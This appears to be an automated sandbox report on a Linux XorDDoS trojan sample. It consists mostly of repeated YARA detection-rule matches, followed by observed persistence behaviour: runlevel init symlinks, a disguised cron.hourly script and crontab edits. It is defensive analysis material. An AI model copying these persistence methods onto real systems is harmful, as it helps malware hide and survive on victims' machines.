Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16

Source: classification engine

Classification label: mal100.troj.evad.lin@0/19@126/0

Source: /tmp/HaJTqGiPpD (PID: 6230)

/run/gcc.pid: mmsjyydscymtdecauqkhzjvkjzvvgigu

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc1.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc2.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc3.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc4.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc5.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc.d/rc1.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc.d/rc2.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc.d/rc3.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc.d/rc4.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior
Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/rc.d/rc5.d/S90HaJTqGiPpD -> /etc/init.d/HaJTqGiPpD	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/HaJTqGiPpD (PID: 6230)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 6235)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 6236)	File: /etc/crontab	Jump to behavior

Source: /tmp/HaJTqGiPpD (PID: 6230)	File opened: /proc/2033/fd	Jump to behavior
